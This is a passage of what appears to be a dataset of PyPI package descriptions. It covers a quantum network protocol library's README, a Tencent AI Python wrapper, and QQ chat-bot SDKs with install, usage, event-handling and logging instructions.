computation. The\nnode usually contains also some additional functions such as sending\nqubits to other nodes, receiving and sending entanglement etc. The\ndifferences have been abstracted away with the mappings forsimulaqronandqunetsim. Other mappings have been considered\nand used but not yet made available most notably forNetsquid.Feel free to add functions, or code new mappings by forking and\npull-requesting insertion of your additions. Please keep us updated with\nyour work so that we inform you of changes that could be breaking\nthings.UsageLook at theexamples/examples.pyfile. The library is instantiated\nfor each node (as if the nodes were independent computers, each loading\nits version of the library).Other sources of inspirations are the tests defined in thetestsdirectoryNew atomic functions will be added following the list established by\nextracting atomic functions from the Quantum Protocol Zoo.TestingTests can be run usingpython setup.py testat the root of the\nrepository.The repository includes a tests directory that contains the filetest_qpz_atomics.pywhich gathers all the tests implemented. It is\nusing thepytestpackage to launch the tests and gather statistics,\nwhile being based onhypothesisfor generating examples.For the tests to run, you need to have a quatum network simulator\navailable and running. 
We have chosen to implement the tests usingsimulaqronas a backend, hence requiring a runningsimulaqroninstance. This can\nbe done typing the following:simulaqronsetmax-qubits100simulaqronstartOther backends could be used provided the tests are rewritten and the\nrequired backend is available and properly mapped in the library.AcknowledgmentsThis project is part of Laboratoire d\u2019Informatique Paris 6 - Sorbonne\nUniversit\u00e9 / CNRS - Quantum Information Team. It is funded and is part\nof the Quantum Internet Alliance European Project."} +{"package": "qq", "pacakge-description": "UNKNOWN"} +{"package": "qq-3-toolbox", "pacakge-description": "Example PackageThis is a simple example package. You can useGithub-flavored Markdownto write your content."} +{"package": "qqai", "pacakge-description": "# qqai\u63d0\u4f9b[\u817e\u8bafAI](https://ai.qq.com/)\u7b80\u5355\u6613\u7528\u7684python\u63a5\u53e3\u3002## \u5b89\u88c5```bashpip install qqai```## \u76ee\u524d\u5b8c\u6210\u7684\u529f\u80fd- [ ] \u81ea\u7136\u8bed\u8a00\u5904\u7406- [x] \u57fa\u7840\u6587\u672c\u5206\u6790- [x] \u5206\u8bcd (`qqai.nlp.text.WordSeg`)- [x] \u8bcd\u6027\u6807\u6ce8 (`qqai.nlp.text.WordPos`)- [x] \u4e13\u6709\u540d\u8bcd\u8bc6\u522b (`qqai.nlp.text.WordNer`)- [x] \u540c\u4e49\u8bcd\u8bc6\u522b (`qqai.nlp.text.WordSyn`)- [x] \u8bed\u4e49\u89e3\u6790- [x] \u610f\u56fe\u6210\u5206\u8bc6\u522b (`qqai.nlp.text.WordCom`)- [x] \u60c5\u611f\u5206\u6790- [x] \u60c5\u611f\u5206\u6790\u8bc6\u522b (`qqai.nlp.text.TextPolar`)- [x] \u667a\u80fd\u95f2\u804a- [x] \u57fa\u7840\u95f2\u804a (`qqai.nlp.text.TextChat`)- [ ] \u673a\u5668\u7ffb\u8bd1- [x] \u6587\u672c\u7ffb\u8bd1- [x] \u6587\u672c\u7ffb\u8bd1\uff08AI Lab\uff09 (`qqai.nlp.translate.TextTranslateAILab`)- [x] \u6587\u672c\u7ffb\u8bd1\uff08\u7ffb\u8bd1\u541b\uff09 (`qqai.nlp.translate.TextTranslateFanyi`)- [x] \u56fe\u7247\u7ffb\u8bd1 (`qqai.nlp.translate.ImageTranslate`)- [ ] \u8bed\u97f3\u7ffb\u8bd1- [x] \u8bed\u79cd\u8bc6\u522b (`qqai.nlp.translate.TextDetect`)- [ ] \u667a\u80fd\u8bed\u97f3- [ ] \u8bed\u97f3\u8bc6\u522b- [x] \u8bed\u97f3\u8bc6\u522b-echo\u7248 (`qqai.aai.audio.AudioRecognitionEcho`)- [ ] \u8bed\u97f3\u8bc6\u522b-\u6d41\u5f0f\u7248\uff08AI Lab\uff09- [ ] \u8bed\u97f3\u8bc6\u522b-\u6d41\u5f0f\u7248(WeChat AI)- [ ] \u957f\u8bed\u97f3\u8bc6\u522b- [ ] \u5173\u952e\u8bcd\u68c0\u7d22- [x] \u8bed\u97f3\u5408\u6210- [x] \u8bed\u97f3\u5408\u6210\uff08AI Lab\uff09 (`qqai.aai.tts.TTSAILab`)- [x] \u8bed\u97f3\u5408\u6210\uff08\u4f18\u56fe\uff09 (`qqai.aai.tts.TTSYouTu`)- [x] \u8ba1\u7b97\u673a\u89c6\u89c9- [x] \u667a\u80fd\u9274\u9ec4 (`qqai.vision.picture.Porn`)- [x] \u66b4\u6050\u8bc6\u522b (`qqai.vision.picture.Terrorism`)- [x] \u4f18\u56feOCR- [x] \u8eab\u4efd\u8bc1OCR (`qqai.vision.ocr.IDCardOCR`)- [x] \u540d\u7247OCR (`qqai.vision.ocr.BCOCR`)- [x] \u884c\u9a76\u8bc1\u9a7e\u9a76\u8bc1OCR (`qqai.vision.ocr.DriverLicenseOCR`)- [x] \u8f66\u724cOCR (`qqai.vision.ocr.PlateOCR`)- [x] \u8425\u4e1a\u6267\u7167OCR (`qqai.vision.ocr.BizLicenseOCR`)- [x] \u94f6\u884c\u5361OCR (`qqai.vision.ocr.CreditCardOCR`)- [x] \u901a\u7528OCR (`qqai.vision.ocr.GeneralOCR`)- [x] \u624b\u5199\u4f53OCR (`qqai.vision.ocr.HandwritingOCR`)- [x] \u4eba\u8138\u8bc6\u522b- [x] \u4eba\u8138\u68c0\u6d4b\u4e0e\u5206\u6790 (`qqai.vision.face.DetectFace`)- [x] \u591a\u4eba\u8138\u68c0\u6d4b (`qqai.vision.face.DetectMultiFace`)- [x] \u4eba\u8138\u5bf9\u6bd4 (`qqai.vision.face.FaceCompare`)- [x] \u8de8\u5e74\u9f84\u4eba\u8138\u8bc6\u522b (`qqai.vision.face.DetectCrossAgeFace`)- [x] 
\u4e94\u5b98\u5b9a\u4f4d (`qqai.vision.face.FaceShape`)- [x] \u4eba\u8138\u8bc6\u522b (`qqai.vision.face.FaceIdentify`)- [x] \u4eba\u8138\u9a8c\u8bc1 (`qqai.vision.face.FaceVerify`)- [x] \u4e2a\u4f53\u7ba1\u7406- [x] \u4e2a\u4f53\u521b\u5efa (`qqai.vision.face.NewPerson`)- [x] \u5220\u9664\u4e2a\u4f53 (`qqai.vision.face.DelPerson`)- [x] \u589e\u52a0\u4eba\u8138 (`qqai.vision.face.AddFace`)- [x] \u5220\u9664\u4eba\u8138 (`qqai.vision.face.DelFace`)- [x] \u8bbe\u7f6e\u4fe1\u606f (`qqai.vision.face.SetInfo`)- [x] \u83b7\u53d6\u4fe1\u606f (`qqai.vision.face.GetInfo`)- [x] \u4fe1\u606f\u67e5\u8be2- [x] \u83b7\u53d6\u7ec4\u5217\u8868 (`qqai.vision.face.GetGroupIds`)- [x] \u83b7\u53d6\u4e2a\u4f53\u5217\u8868 (`qqai.vision.face.GetPersonIds`)- [x] \u83b7\u53d6\u4eba\u8138\u5217\u8868 (`qqai.vision.face.GetFaceIds`)- [x] \u83b7\u53d6\u4eba\u8138\u4fe1\u606f (`qqai.vision.face.GetFaceInfo`)- [x] \u56fe\u7247\u8bc6\u522b- [x] \u7269\u4f53\u573a\u666f\u8bc6\u522b- [x] \u573a\u666f\u8bc6\u522b (`qqai.vision.picture.SceneR`)- [x] \u7269\u4f53\u8bc6\u522b (`qqai.vision.picture.ObjectR`)- [x] \u56fe\u7247\u6807\u7b7e\u8bc6\u522b (`qqai.vision.picture.Tag`)- [x] \u770b\u56fe\u8bf4\u8bdd (`qqai.vision.picture.ImgToText`)- [x] \u6a21\u7cca\u56fe\u7247\u68c0\u6d4b (`qqai.vision.picture.Fuzzy`)- [x] \u7f8e\u98df\u56fe\u7247\u8bc6\u522b (`qqai.vision.picture.Food`)- [x] \u56fe\u7247\u7279\u6548- [x] \u4eba\u8138\u7f8e\u5986 (`qqai.vision.ptu.FaceCosmetic`)- [x] \u4eba\u8138\u53d8\u5986 (`qqai.vision.ptu.FaceDecoration`)- [x] \u6ee4\u955c- [x] \u6ee4\u955c\uff08\u5929\u5929P\u56fe\uff09 (`qqai.vision.ptu.ImgFilterPitu`)- [x] \u6ee4\u955c\uff08AI Lab\uff09 (`qqai.vision.ptu.ImgFilterAILab`)- [x] \u4eba\u8138\u878d\u5408 (`qqai.vision.ptu.FaceMerge`)- [x] \u5927\u5934\u8d34 (`qqai.vision.ptu.FaceSticker`)- [x] \u989c\u9f84\u68c0\u6d4b (`qqai.vision.ptu.FaceAge`)## \u8c03\u7528\u65b9\u5f0f\u53ef\u4ee5\u76f4\u63a5\u5bfc\u5165\u5305\uff0c\u518d\u4f7f\u7528\u5176\u4e2d\u7684\u7c7b\uff1b\u4e5f\u53ef\u4ee5\u5bfc\u5165\u5b50\u5305\u6216\u7c7b\u3002\u8c03\u7528\u7c7b\u7684\u65f6\u5019\u5b9a\u4e49\u597dAppID\u548cAppKey\u3002\u5404\u4e2a\u7c7b\u90fd\u6709\u4e00\u4e2a`run()`\u65b9\u6cd5\u4ee5\u6267\u884c\u64cd\u4f5c\u3002\u8be5\u65b9\u6cd5\u53c2\u6570\u6709\u6240\u4e0d\u540c\uff0c\u8bf7\u67e5\u9605\u5f00\u53d1\u5e73\u53f0\u6587\u6863\u548c\u4ee3\u7801\u4ee5\u8f93\u5165\u3002\u4ee5\u4e0b\u4e3a\u793a\u4f8b\uff1a```pythonimport qqaiqqai.vision.picture.ImgToText('your_app_id', 'your_app_key').run('https://yyb.gtimg.com/aiplat/ai/assets/ai-demo/express-6.jpg')# {'ret': 0, 'msg': 'ok', 'data': {'text': '\u4e00\u4f4d\u7537\u58eb\u5728\u6d77\u8fb9\u9a91\u81ea\u884c\u8f66\u7684\u7167\u7247'}}from qqai.vision.picture import ImgToTextit = ImgToText('your_app_id', 'your_app_key')it.run('https://yyb.gtimg.com/aiplat/ai/assets/ai-demo/express-6.jpg')# {'ret': 0, 'msg': 'ok', 'data': {'text': '\u4e00\u4f4d\u7537\u58eb\u5728\u6d77\u8fb9\u9a91\u81ea\u884c\u8f66\u7684\u7167\u7247'}}```## \u7528\u6cd5\uff08\u539f\u6587\u6863\uff09\u5f53\u524d\u5305\u542b\u4ee5\u4e0b\u63a5\u53e3\uff1a- [\u804a\u5929\u673a\u5668\u4eba](#\u804a\u5929\u673a\u5668\u4eba)- [\u6587\u672c\u7ffb\u8bd1](#\u6587\u672c\u7ffb\u8bd1)- [\u56fe\u7247\u8f6c\u6587\u5b57](#\u56fe\u7247\u8f6c\u6587\u5b57)- [\u4eba\u8138\u68c0\u6d4b](#\u4eba\u8138\u68c0\u6d4b)### \u804a\u5929\u673a\u5668\u4eba```pyfrom qqai import TextChatsiri = TextChat(your_app_id, your_app_key)# \u5355\u53e5\u5bf9\u8bddanswer = siri.ask('\u4f60\u662f\u8c01')print(answer)# >>> 
\u6211\u662f\u4f60\u7684\u5c0f\u52a9\u624b\u554a# \u8fde\u7eed\u804a\u5929siri.chat()# < \u6709\u5565\u60f3\u8ddf\u6211\u8bf4\u7684\uff1f# > \u4f60\u662f\u8c01\u554a\uff1f# < \u6211\u662f\u4f60\u7684\u5c0f\u52a9\u624b\u554a# > \u4f60\u80fd\u5e72\u561b\u5440# < \u5475\u5475\uff0c\u6211\u80fd\u5e72\u7684\u4e8b\u60c5\u591a\u7684\u6570\u4e0d\u6e05\u3002```### \u6587\u672c\u7ffb\u8bd1\u53ef\u7528\u8bed\u8a00\u89c1[\u5b98\u65b9\u6587\u6863](https://ai.qq.com/doc/nlptrans.shtml#5-%E6%94%AF%E6%8C%81%E8%AF%AD%E8%A8%80%E5%AE%9A%E4%B9%89)```pyfrom qqai import NLPTransrobot = NLPTrans(you_app_id, you_app_key)result = robot.run('\u613f\u539f\u529b\u4e0e\u4f60\u540c\u5728')print(result)# {'ret': 0, 'msg': 'ok', 'data': {'source_text': '\u613f\u539f\u529b\u4e0e\u4f60\u540c\u5728', 'target_text': 'May the Force be with you'}}# \u9ed8\u8ba4\u4e3a\u4e2d\u82f1\u7ffb\u8bd1\uff0c\u82e5\u9700\u8981\u5176\u4ed6\u8bed\u79cd\u7ffb\u8bd1\uff0c\u8bf7\u6309\u4ee5\u4e0b\u683c\u5f0f\u5b9e\u4f8b\u5316\uff1a# source\u4e3a\u6e90\u8bed\u8a00\uff0ctarget\u4e3a\u76ee\u6807\u8bed\u8a00\uff0crobot = NLPTrans(you_app_id, you_app_key, source='en', target='es')result = robot.run('May the force be with you.')print(result)# {'ret': 0, 'msg': 'ok', 'data': {'source_text': 'May the force be with you.', 'target_text': 'Que la fuerza est\u00e9 contigo.'}}```### \u56fe\u7247\u8f6c\u6587\u5b57```pyfrom qqai import ImgToTextrobot = ImgToText(your_app_id, your_app_key)# \u8bc6\u522b\u56fe\u7247URLresult = robot.run('https://yyb.gtimg.com/aiplat/ai/assets/ai-demo/express-6.jpg')print(result)# {'ret': 0, 'msg': 'ok', 'data': {'text': '\u4e00\u4f4d\u7537\u58eb\u5728\u6d77\u8fb9\u9a91\u81ea\u884c\u8f66\u7684\u7167\u7247'}}# \u8bc6\u522b\u6253\u5f00\u7684\u672c\u5730\u56fe\u7247with open('/my/img.jpeg', 'rb') as image_file:result = robot.run(image_file)print(result)# {'ret': 0, 'msg': 'ok', 'data': {'text': '\u4e00\u8258\u98de\u8239'}}```### \u4eba\u8138\u68c0\u6d4b```pyfrom qqai import Detectfacerobot = Detectface(your_app_id, your_app_key)# \u8c03\u7528\u65b9\u6cd5\u4e0e\u56fe\u7247\u8f6c\u6587\u5b57\u76f8\u540c```"} +{"package": "qqbot", "pacakge-description": "No description available on PyPI."} +{"package": "qq-bot", "pacakge-description": "qq-bot-pythonsdk\u5b89\u88c5\u5916\u53d1\u7248\u672c\u901a\u8fc7\u4e0b\u9762\u65b9\u5f0f\u5b89\u88c5pipinstallqq-bot# \u6ce8\u610f\u662f qq-bot \u800c\u4e0d\u662f qqbot\uff01\u66f4\u65b0\u5305\u7684\u8bdd\u9700\u8981\u6dfb\u52a0--upgrade\u6ce8\uff1a\u9700\u8981python3.7+sdk\u4f7f\u7528\u9700\u8981\u4f7f\u7528\u7684\u5730\u65b9import SDKimportqqbot\u793a\u4f8b\u673a\u5668\u4eba``examples`<./examples/>`_ \u76ee\u5f55\u4e0b\u5b58\u653e\u793a\u4f8b\u673a\u5668\u4eba\uff0c\u53ef\u4f9b\u5b9e\u73b0\u53c2\u8003\u3002qqbot-API\u57fa\u4e8ehttps://bot.q.qq.com/wiki/develop/api/\u673a\u5668\u4eba\u5f00\u653e\u5e73\u53f0API\u5b9e\u73b0\u7684API\u63a5\u53e3\u5c01\u88c5\u3002\u4f7f\u7528\u65b9\u6cd5\u901a\u8fc7import\u5bf9\u5e94API\u7684\u7c7b\u6765\u8fdb\u884c\u4f7f\u7528\uff0c\u6784\u9020\u53c2\u6570\uff08Token\u5bf9\u8c61\uff0c\u662f\u5426\u6c99\u76d2\u6a21\u5f0f\uff09\u3002\u6bd4\u5982\u4e0b\u9762\u7684\u4f8b\u5b50\uff0c\u901a\u8fc7api\u5f53\u524d\u673a\u5668\u4eba\u7684\u76f8\u5173\u4fe1\u606f\uff1aimportqqbottoken=qqbot.Token(\"{appid}\",\"{token}\")api=qqbot.UserAPI(token,False)user=api.me()print(user.username)# \u6253\u5370\u673a\u5668\u4eba\u540d\u5b57async \u793a\u4f8b\uff1aimportqqbottoken=qqbot.Token(\"{appid}\",\"{token}\")api=qqbot.AsyncUserAPI(token,False)# 
\u83b7\u53d6looploop=asyncio.get_event_loop()user=loop.run_until_complete(api.me())print(user.username)# \u6253\u5370\u673a\u5668\u4eba\u540d\u5b57qqbot-\u4e8b\u4ef6\u76d1\u542c\u5f02\u6b65\u6a21\u5757\u57fa\u4e8e websocket \u6280\u672f\u7528\u4e8e\u76d1\u542c\u9891\u9053\u5185\u7684\u76f8\u5173\u4e8b\u4ef6\uff0c\u5982\u6d88\u606f\u3001\u6210\u5458\u53d8\u5316\u7b49\u4e8b\u4ef6\uff0c\u7528\u4e8e\u5f00\u53d1\u8005\u5bf9\u4e8b\u4ef6\u8fdb\u884c\u76f8\u5e94\u7684\u5904\u7406\u3002\u4f7f\u7528\u65b9\u6cd5\u901a\u8fc7\u6ce8\u518c\u9700\u8981\u76d1\u542c\u7684\u4e8b\u4ef6\u5e76\u8bbe\u7f6e\u56de\u8c03\u51fd\u6570\u540e\uff0c\u5373\u53ef\u5b8c\u6210\u5bf9\u4e8b\u4ef6\u7684\u76d1\u542c\u3002\u6bd4\u5982\u4e0b\u9762\u8fd9\u4e2a\u4f8b\u5b50\uff1a\u9700\u8981\u76d1\u542c\u673a\u5668\u4eba\u88ab@\u540e\u6d88\u606f\u5e76\u8fdb\u884c\u76f8\u5e94\u7684\u56de\u590d\u3002\u5148\u521d\u59cb\u5316\u9700\u8981\u7528\u7684token\u5bf9\u8c61\uff08appid\u548ctoken\u53c2\u6570\u4ece\u673a\u5668\u4eba\u7ba1\u7406\u7aef\u83b7\u53d6 \uff09\u901a\u8fc7qqbot.listen_events\u6ce8\u518c\u9700\u8981\u76d1\u542c\u7684\u4e8b\u4ef6\u901a\u8fc7qqbot.HandlerType\u5b9a\u4e49\u9700\u8981\u76d1\u542c\u7684\u4e8b\u4ef6\uff08\u90e8\u5206\u4e8b\u4ef6\u53ef\u80fd\u9700\u8981\u6743\u9650\u7533\u8bf7\uff09token=qqbot.Token(\"{appid}\",\"{token}\")# \u6ce8\u518c\u4e8b\u4ef6\u7c7b\u578b\u548c\u56de\u8c03\uff0c\u53ef\u4ee5\u6ce8\u518c\u591a\u4e2aqqbot_handler=qqbot.Handler(qqbot.HandlerType.AT_MESSAGE_EVENT_HANDLER,_message_handler)qqbot.listen_events(token,False,qqbot_handler)\u6700\u540e\u5b9a\u4e49\u6ce8\u518c\u4e8b\u4ef6\u56de\u8c03\u6267\u884c\u51fd\u6570,\u5982_message_handler\u3002def_message_handler(event,message:Message):msg_api=qqbot.MessageAPI(token,False)# \u6253\u5370\u8fd4\u56de\u4fe1\u606fqqbot.logger.info(\"event%s\"%event+\",receive message%s\"%message.content)# \u6784\u9020\u6d88\u606f\u53d1\u9001\u8bf7\u6c42\u6570\u636e\u5bf9\u8c61send=qqbot.MessageSendRequest(\"<@%s>\u8c22\u8c22\u4f60\uff0c\u52a0\u6cb9\"%message.author.id,message.id)# \u901a\u8fc7api\u53d1\u9001\u56de\u590d\u6d88\u606fmsg_api.post_message(message.channel_id,send)async \u793a\u4f8b:# async\u7684\u5f02\u6b65\u63a5\u53e3\u7684\u4f7f\u7528\u793a\u4f8btoken=qqbot.Token(\"{appid}\",\"{token}\")qqbot_handler=qqbot.Handler(qqbot.HandlerType.AT_MESSAGE_EVENT_HANDLER,_message_handler)qqbot.async_listen_events(token,False,qqbot_handler)asyncdef_message_handler(event,message:qqbot.Message):\"\"\"\n \u5b9a\u4e49\u4e8b\u4ef6\u56de\u8c03\u7684\u5904\u7406\n\n :param event: \u4e8b\u4ef6\u7c7b\u578b\n :param message: \u4e8b\u4ef6\u5bf9\u8c61\uff08\u5982\u76d1\u542c\u6d88\u606f\u662fMessage\u5bf9\u8c61\uff09\n \"\"\"msg_api=qqbot.AsyncMessageAPI(token,False)# \u6253\u5370\u8fd4\u56de\u4fe1\u606fqqbot.logger.info(\"event%s\"%event+\",receive message%s\"%message.content)foriinrange(5):awaitasyncio.sleep(5)# \u6784\u9020\u6d88\u606f\u53d1\u9001\u8bf7\u6c42\u6570\u636e\u5bf9\u8c61send=qqbot.MessageSendRequest(\"<@%s>\u8c22\u8c22\u4f60\uff0c\u52a0\u6cb9 \"%message.author.id,message.id)# \u901a\u8fc7api\u53d1\u9001\u56de\u590d\u6d88\u606fawaitmsg_api.post_message(message.channel_id,send)\u6ce8\uff1a\u5f53\u524d\u652f\u6301\u4e8b\u4ef6\u53ca\u56de\u8c03\u6570\u636e\u5bf9\u8c61\u4e3a\uff1aclassHandlerType(Enum):PLAIN_EVENT_HANDLER=0# \u900f\u4f20\u4e8b\u4ef6GUILD_EVENT_HANDLER=1# \u9891\u9053\u4e8b\u4ef6GUILD_MEMBER_EVENT_HANDLER=2# \u9891\u9053\u6210\u5458\u4e8b\u4ef6CHANNEL_EVENT_HANDLER=3# \u5b50\u9891\u9053\u4e8b\u4ef6MESSAGE_EVENT_HANDLER=4# 
\u6d88\u606f\u4e8b\u4ef6AT_MESSAGE_EVENT_HANDLER=5# At\u6d88\u606f\u4e8b\u4ef6# DIRECT_MESSAGE_EVENT_HANDLER = 6 # \u79c1\u4fe1\u6d88\u606f\u4e8b\u4ef6# AUDIO_EVENT_HANDLER = 7 # \u97f3\u9891\u4e8b\u4ef6\u4e8b\u4ef6\u56de\u8c03\u51fd\u6570\u7684\u53c2\u6570 1 \u4e3a\u4e8b\u4ef6\u540d\u79f0\uff0c\u53c2\u6570 2 \u8fd4\u56de\u5177\u4f53\u7684\u6570\u636e\u5bf9\u8c61\u3002# \u900f\u4f20\u4e8b\u4ef6\uff08\u65e0\u5177\u4f53\u7684\u6570\u636e\u5bf9\u8c61\uff0c\u6839\u636e\u540e\u53f0\u8fd4\u56deJson\u5bf9\u8c61\uff09def_plain_handler(event,data):# \u9891\u9053\u4e8b\u4ef6def_guild_handler(event,guild:Guild):# \u9891\u9053\u6210\u5458\u4e8b\u4ef6def_guild_member_handler(event,guild_member:GuildMember):# \u5b50\u9891\u9053\u4e8b\u4ef6def_channel_handler(event,channel:Channel):# \u6d88\u606f\u4e8b\u4ef6# At\u6d88\u606f\u4e8b\u4ef6def_message_handler(event,message:Message):\u65e5\u5fd7\u6253\u5370\u57fa\u4e8e\u81ea\u5e26\u7684 logging \u6a21\u5757\u5c01\u88c5\u7684\u65e5\u5fd7\u6a21\u5757\uff0c\u63d0\u4f9b\u4e86\u65e5\u5fd7\u5199\u5165\u4ee5\u53ca\u7f8e\u5316\u4e86\u6253\u5370\u683c\u5f0f\uff0c\u5e76\u652f\u6301\u901a\u8fc7\u8bbe\u7f6eQQBOT_LOG_LEVEL\u73af\u5883\u53d8\u91cf\u6765\u8c03\u6574\u65e5\u5fd7\u6253\u5370\u7ea7\u522b\uff08\u9ed8\u8ba4\u6253\u5370\u7ea7\u522b\u4e3aINFO\uff09\u3002\u4f7f\u7528\u65b9\u6cd5\u5f15\u7528\u6a21\u5757\uff0c\u5e76\u83b7\u53d6logger\u5b9e\u4f8b\uff1afromcore.utilimportlogginglogger=logging.getLogger()\u6216\u8005\u901a\u8fc7qqbot.logger\u4e5f\u53ef\u4ee5\u83b7\u53d6logger\u5bf9\u8c61\u7136\u540e\u5c31\u53ef\u4ee5\u6109\u5feb\u5730\u4f7f\u7528 logger \u8fdb\u884c\u6253\u5370\u3002\u4f8b\u5982\uff1alogger.info(\"hello world!\")\u8bbe\u7f6e\u65e5\u5fd7\u7ea7\u522bSDK\u9ed8\u8ba4\u7684\u65e5\u5fd7\u7ea7\u522b\u4e3aINFO\u7ea7\u522b\uff0c\u9700\u8981\u4fee\u6539\u8bf7\u67e5\u770b\u4e0b\u9762\u4fe1\u606fDebug\u65e5\u5fd7\u547d\u4ee4\u884c\u542f\u52a8py\u540e\u901a\u8fc7\u589e\u52a0\u53c2\u6570-d\u6216--debug\u53ef\u4ee5\u6253\u5f00debug\u65e5\u5fd7python3demo_at_reply.py-d\u5176\u4ed6\u7ea7\u522b\u65e5\u5fd7\u901a\u8fc7export\u547d\u4ee4\u6dfb\u52a0QQBOT_LOG_LEVEL\u73af\u5883\u53d8\u91cf\u53ef\u4ee5\u8bbe\u7f6e\u65e5\u5fd7\u7ea7\u522b\u3002\u4f8b\u5982\uff1aexportQQBOT_LOG_LEVEL=10# 10\u8868\u793aDEBUG\u7ea7\u522b\u51e0\u4e2a\u53ef\u9009\u53d6\u503c\uff08\u53c2\u8003\u4e86logging\u6a21\u5757\u7684\u53d6\u503c\uff09\uff1aLevel\u53d6\u503cCRITICAL50ERROR40WARNING30INFO20DEBUG10NOTSET0\u7981\u7528\u65e5\u5fd7\u6587\u4ef6\u8f93\u51fa\u9ed8\u8ba4\u60c5\u51b5\u4e0b qqbot \u4f1a\u5728\u5f53\u524d\u6267\u884c\u76ee\u5f55\u4e0b\u751f\u6210\u683c\u5f0f\u4e3aqqbot.log.*\u7684\u65e5\u5fd7\u6587\u4ef6\u3002\u5982\u679c\u60f3\u7981\u7528\u8fd9\u4e9b\u65e5\u5fd7\u6587\u4ef6\uff0c\u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6eQQBOT_DISABLE_LOG\u73af\u5883\u53d8\u91cf\u4e3a 1 \u6765\u5173\u95ed\u3002exportQQBOT_DISABLE_LOG=1# 1\u8868\u793a\u7981\u7528\u65e5\u5fd7\u4fee\u6539\u65e5\u5fd7\u8f93\u51fa\u8def\u5f84SDK\u4e5f\u652f\u6301\u4fee\u6539\u65e5\u5fd7\u8f93\u51fa\u8def\u5f84\uff0c\u7531\u4e8e\u5b9e\u9645\u8def\u5f84\u4e0d\u5c3d\u76f8\u540c\uff0c\u6240\u4ee5\u6b64\u5904\u4f7f\u7528os\u6a21\u5757\u6765\u8bbe\u7f6e\u4e34\u65f6\u73af\u5883\u53d8\u91cf\u3002importosos.environ[\"QQBOT_LOG_PATH\"]=os.path.join(os.getcwd(),\"log\",\"%(name)s.log\")# 
\u65e5\u5fd7\u5c06\u751f\u6210\u5728\u6267\u884c\u76ee\u5f55\u4e0blog\u6587\u4ef6\u5939\u5185\u4fee\u6539\u65e5\u5fd7\u683c\u5f0f\u901a\u8fc7export\u547d\u4ee4\u6dfb\u52a0QQBOT_LOG_FILE_FORMAT\u548cQQBOT_LOG_PRINT_FORMAT\u73af\u5883\u53d8\u91cf\u53ef\u4ee5\u8bbe\u7f6e\u65e5\u5fd7\u683c\u5f0f\u3002\u4f8b\u5982\uff1a# \u8bbe\u7f6e\u6587\u4ef6\u8f93\u51fa\u683c\u5f0fexportQQBOT_LOG_FILE_FORMAT=\"%(asctime)s [%(levelname)s] %(funcName)s (%(filename)s:%(lineno)s): %(message)s\"\u5982\u9700\u4f7f\u7528\u8f6c\u4e49\u5b57\u7b26\uff0c\u53ef\u4ee5\u4f7f\u7528os\u6a21\u5757\u6dfb\u52a0\u3002\u4f8b\u5982\uff1a# \u8bbe\u7f6e\u63a7\u5236\u53f0\u8f93\u51fa\u683c\u5f0fimportosos.environ[\"QQBOT_LOG_PRINT_FORMAT\"]=\"%(asctime)s\\033[1;33m[%(levelname)s]%(funcName)s(%(filename)s:%(lineno)s):\\033[0m%(message)s\"sdk\u5f00\u53d1\u73af\u5883\u914d\u7f6epipinstall-rrequirements.txt# \u5b89\u88c5\u4f9d\u8d56\u7684pip\u5305pre-commitinstall# \u5b89\u88c5\u683c\u5f0f\u5316\u4ee3\u7801\u7684\u94a9\u5b50\u5355\u5143\u6d4b\u8bd5\u4ee3\u7801\u5e93\u63d0\u4f9bAPI\u63a5\u53e3\u6d4b\u8bd5\u548c websocket \u7684\u5355\u6d4b\u7528\u4f8b\uff0c\u4f4d\u4e8etests\u76ee\u5f55\u4e2d\u3002\u5982\u679c\u9700\u8981\u81ea\u5df1\u8fd0\u884c\uff0c\u53ef\u4ee5\u5728tests\u76ee\u5f55\u91cd\u547d\u540d.test.yaml\u6587\u4ef6\u540e\u6dfb\u52a0\u81ea\u5df1\u7684\u6d4b\u8bd5\u53c2\u6570\u542f\u52a8\u6d4b\u8bd5\uff1a# test yaml \u7528\u4e8e\u8bbe\u7f6etest\u76f8\u5173\u7684\u53c2\u6570\uff0c\u5f00\u6e90\u7248\u672c\u9700\u8981\u53bb\u6389\u53c2\u6570token:appid:\"xxx\"token:\"xxxxx\"test_params:guild_id:\"xx\"guild_owner_id:\"xx\"guild_owner_name:\"xx\"guild_test_member_id:\"xx\"guild_test_role_id:\"xx\"channel_id:\"xx\"channel_name:\"xx\"robot_name:\"xxx\"is_sandbox:False\u5355\u6d4b\u6267\u884c\u65b9\u6cd5\uff1a\u5148\u786e\u4fdd\u5df2\u5b89\u88c5pytest\uff1apipinstallpytest\u7136\u540e\u5728\u9879\u76ee\u6839\u76ee\u5f55\u4e0b\u6267\u884c\u5355\u6d4b\uff1apytest\u52a0\u5165\u5b98\u65b9\u793e\u533a\u6b22\u8fce\u626b\u7801\u52a0\u5165QQ \u9891\u9053\u5f00\u53d1\u8005\u793e\u533a\u3002"} +{"package": "qqbot-linger", "pacakge-description": "\u73b2\u513f\u81ea\u7528 QQ \u673a\u5668\u4eba\u3002\u529f\u80fdBilibili \u7528\u6237\u76d1\u63a7\uff0c\u53c2\u89c1\uff1anonebot-plugin-bam\u8dd1\u56e2\u9ab0\u5b50\uff0c\u53c2\u89c1nonebot-plugin-7s-roll\u4f7f\u7528pipinstallqqbot-lingercd/a/path/you/want/store/config/and/database\nvim.env# edit this file, see `.env.sample file` for a example# Start a IM Bot Client compatible with OneBot v11 protocol# Like go-cqhttp, cqhttp-mirai etclinger# start the bot\u6ce8\u610f\uff1a\u4f60\u9700\u8981\u4e00\u4e2a\u652f\u6301\u8fde\u63a5 OneBot V11 \u534f\u8bae\u7684 IM \u5ba2\u6237\u7aef\u7684\u5177\u4f53\u5b9e\u73b0\uff0c\u5e76\u5c06\u5176\u914d\u7f6e\u4e3a\u8fde\u63a5\u5230\u6b64\u673a\u5668\u4eba\u7684 WS \u7aef\u53e3\uff0c\u624d\u80fd\u5b9e\u9645\u4f7f\u7528\u5176\u529f\u80fd\u3002\u622a\u56fe\u4ee5\u540e\u518d\u5f04\u3002LICENSEUnlicense."} +{"package": "qq-botpy", "pacakge-description": 